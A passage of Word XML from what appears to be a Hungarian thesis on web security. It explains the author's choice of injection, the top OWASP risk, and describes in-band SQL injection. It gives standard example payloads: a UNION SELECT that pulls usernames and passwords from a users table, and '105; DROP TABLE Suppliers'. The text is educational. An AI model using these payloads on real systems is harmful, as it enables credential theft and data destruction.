          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> során meglehetősen </w:t>
      </w:r>
      <w:r w:rsidR="006D7A4A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">kevés időt vett igénybe a konkrét </w:t>
      </w:r>
      <w:r w:rsidR="00FB1FC5" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>biztonsági kockázat kiválasztása.</w:t>
      </w:r>
      <w:r w:rsidR="00E91439" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Szerettem volna egy olyan sérülékenység köré építeni a programom megvalósítását, amelyhez sok példa és ellenpélda tartozik, valamint </w:t>
      </w:r>
      <w:r w:rsidR="00695369" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a dokumentáltsága jobb, mint kiváló.</w:t>
      </w:r>
      <w:r w:rsidR="00EF176B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> A választásom ez okból esett az első számú </w:t>
      </w:r>
      <w:r w:rsidR="00594709" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kockázat</w:t>
      </w:r>
      <w:r w:rsidR="00923B77" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> egy fajtájára.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07848EBF" w14:textId="41EF5EF3" w:rsidR="00C31F3C" w:rsidRPr="00D47FAE" w:rsidRDefault="004F196C" w:rsidP="003916E5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>AZ OWASP (</w:t>
      </w:r>
      <w:r w:rsidR="00381AFC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>The Open Web Application Security Project</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00381AFC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C54B5" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>listáján</w:t>
      </w:r>
      <w:r w:rsidR="00EE7FF7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000C54B5" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>amely a legkritikusabb biztonsági kockázatokat taglalj</w:t>
      </w:r>
      <w:r w:rsidR="00CF13A0" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a, </w:t>
      </w:r>
      <w:r w:rsidR="00A10100" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00C13A53" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z </w:t>
      </w:r>
      <w:r w:rsidR="008D4392" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00C13A53" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>njection (magyarul:</w:t>
      </w:r>
      <w:r w:rsidR="006D403D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> befecskendezés</w:t>
      </w:r>
      <w:r w:rsidR="00C66B7E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, injekció</w:t>
      </w:r>
      <w:r w:rsidR="00C13A53" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006D403D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F00E3F" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>áll az első helyen.</w:t>
      </w:r>
      <w:r w:rsidR="00AA4AEF" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ez </w:t>
      </w:r>
      <w:r w:rsidR="001A655C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00AA4AEF" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">támadási típus </w:t>
      </w:r>
      <w:r w:rsidR="00E674C0" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a felhasználói input elégtelen mértékű validációjából ered</w:t>
      </w:r>
      <w:r w:rsidR="00F55D34" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, amely lehetővé tesz rosszindulatú SQL utasítások végrehajtását</w:t>
      </w:r>
      <w:r w:rsidR="00286967" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, amelyek </w:t>
      </w:r>
      <w:r w:rsidR="00455912" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>közvetlenül az adatbázisból kérhetnek le adatokat</w:t>
      </w:r>
      <w:r w:rsidR="00D54DC2" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, emellett adminisztrációs műveleteket hajthatnak végre az adatbázisban, a DBMS fájlban található adott fájl tartalmát helyreállíthatja a rendszerben, és egyes esetekben parancsokat adhat ki az operációs rendszernek</w:t>
      </w:r>
      <w:r w:rsidR="002C0D51" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003916E5" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0052366A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Például az alábbi sor</w:t>
      </w:r>
      <w:r w:rsidR="0099435A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00974B65" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>' UNION SELECT username, password FROM user</w:t>
      </w:r>
      <w:r w:rsidR="0041732B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F04D4C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidR="00F04D4C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="008D23E2" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A8064A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">megadása </w:t>
      </w:r>
      <w:r w:rsidR="001335AC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">bemeneti paraméterként </w:t>
      </w:r>
      <w:r w:rsidR="003C5957" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">az alábbi SQL lekérdezést futtathatja amennyiben </w:t>
      </w:r>
      <w:r w:rsidR="008F7054" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a bemenet sérülékeny</w:t>
      </w:r>
      <w:r w:rsidR="000D65E7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003C5957" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">létezik </w:t>
      </w:r>
      <w:r w:rsidR="00D639C7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidR="00D639C7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> tábla, valamint </w:t>
      </w:r>
      <w:r w:rsidR="00D639C7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="00D639C7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> és </w:t>
      </w:r>
      <w:r w:rsidR="00D639C7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00D639C7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> oszlop:</w:t>
      </w:r>
      <w:r w:rsidR="004D3F12" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0041732B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users</w:t>
      </w:r>
      <w:r w:rsidR="00F04D4C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidR="00F04D4C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00D05290" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00354883" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00354883" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A lekérdezés eredménye az adatbázis összes felhasználójának neve és jelszava.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5F830E" w14:textId="4B3EE7E8" w:rsidR="00A4574B" w:rsidRPr="00D47FAE" w:rsidRDefault="00A14166" w:rsidP="00621861">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ebből adódóan kijelenthetjük, hogy a</w:t>
      </w:r>
      <w:r w:rsidR="007761BD" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z </w:t>
      </w:r>
      <w:r w:rsidR="008D4392" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="007761BD" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>njection napjaink leggyakoribb és legveszélyesebb sérülékenysége</w:t>
      </w:r>
      <w:r w:rsidR="00A4574B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAB710F" w14:textId="77777777" w:rsidR="002B099A" w:rsidRPr="00D47FAE" w:rsidRDefault="002B099A" w:rsidP="00E51FCF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F109988" w14:textId="4E387194" w:rsidR="002B099A" w:rsidRPr="00D47FAE" w:rsidRDefault="00FA2BAA" w:rsidP="003713C3">
      <w:pPr>
        <w:pStyle w:val="Cmsor2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc71471963"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Típusai</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="0DD43311" w14:textId="77777777" w:rsidR="00A6614D" w:rsidRPr="00D47FAE" w:rsidRDefault="00A6614D" w:rsidP="00533AF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB3D35B" w14:textId="3AF6FACC" w:rsidR="0027563B" w:rsidRPr="00D47FAE" w:rsidRDefault="00D43621" w:rsidP="00D43621">
      <w:pPr>
        <w:pStyle w:val="Stlus3"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc71471964"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:t>Sávon belüli</w:t>
      </w:r>
      <w:r w:rsidR="0077574A" w:rsidRPr="00D47FAE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001576C7" w:rsidRPr="00D47FAE">
        <w:t>(in-band</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:t>, classic</w:t>
      </w:r>
      <w:r w:rsidR="001576C7" w:rsidRPr="00D47FAE">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A60A41" w:rsidRPr="00D47FAE">
        <w:t xml:space="preserve"> SQLi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="29CC43FA" w14:textId="77777777" w:rsidR="007E4122" w:rsidRPr="00D47FAE" w:rsidRDefault="007E4122" w:rsidP="007E4122">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A7300B1" w14:textId="6624BC02" w:rsidR="00986C80" w:rsidRPr="00D47FAE" w:rsidRDefault="00FC40BE" w:rsidP="00746F76">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ahogy a korábbi példa szemléltette,</w:t>
      </w:r>
      <w:r w:rsidR="00A41ECC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a s</w:t>
      </w:r>
      <w:r w:rsidR="00D86CBE" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ikeres SQL </w:t>
      </w:r>
      <w:r w:rsidR="0031328F" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00D86CBE" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>njection támadás képes</w:t>
      </w:r>
      <w:r w:rsidR="007A5F01" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D86CBE" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>érzékeny adatok kiolvasására az adatbázisból</w:t>
      </w:r>
      <w:r w:rsidR="003B5661" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00746F76" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A04B8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Egyik l</w:t>
      </w:r>
      <w:r w:rsidR="001328B6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>egfőbb eszköze a</w:t>
      </w:r>
      <w:r w:rsidR="005009F7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r w:rsidR="001328B6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001328B6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidR="001328B6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> operátor</w:t>
      </w:r>
      <w:r w:rsidR="002D1B0D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, amely lehetővé tesz egy vagy több további</w:t>
      </w:r>
      <w:r w:rsidR="009524A3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D1B0D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidR="002D1B0D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> lekérdezés végrehajtását és az eredmények hozzáfűzését az eredeti lekérdezéshez.</w:t>
      </w:r>
      <w:r w:rsidR="008361BD" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sikerességének feltétele, hogy a két</w:t>
      </w:r>
      <w:r w:rsidR="006E1C89" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> vagy több</w:t>
      </w:r>
      <w:r w:rsidR="008361BD" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008361BD" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidR="008361BD" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> oszlopszáma és oszloptípusai megegyezzenek</w:t>
      </w:r>
      <w:r w:rsidR="005D66C0" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> vagy konvertálhatóak legyenek</w:t>
      </w:r>
      <w:r w:rsidR="00F70B5D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> páronként</w:t>
      </w:r>
      <w:r w:rsidR="008361BD" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C67E4C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E28A4F" w14:textId="028AA6AC" w:rsidR="000A09AE" w:rsidRPr="00D47FAE" w:rsidRDefault="002E68BD" w:rsidP="00986C80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Adatok kiolvasásán, lekérdezésén</w:t>
      </w:r>
      <w:r w:rsidR="002D7955" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> kívül</w:t>
      </w:r>
      <w:r w:rsidR="005A646E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> képes</w:t>
      </w:r>
      <w:r w:rsidR="00C83D40" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED665B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">továbbá </w:t>
      </w:r>
      <w:r w:rsidR="00D86CBE" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">adatbázis béli adatok </w:t>
      </w:r>
      <w:r w:rsidR="00B131CB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>törlésére</w:t>
      </w:r>
      <w:r w:rsidR="005C2827" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008409CB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> módosítására, beszúrására és frissítésére, ha az alábbi sémát vesszük alapul</w:t>
      </w:r>
      <w:r w:rsidR="005719AA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00970CB5" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009820AF" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>105; DROP TABLE Suppliers</w:t>
      </w:r>
      <w:r w:rsidR="00BA2124" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2124" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidR="00970CB5" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. Így a </w:t>
      </w:r>
      <w:r w:rsidR="00B9265D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">tényleges </w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">lekérdezés </w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidR="00EA7546" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="00EA7546" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidR="00EA7546" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
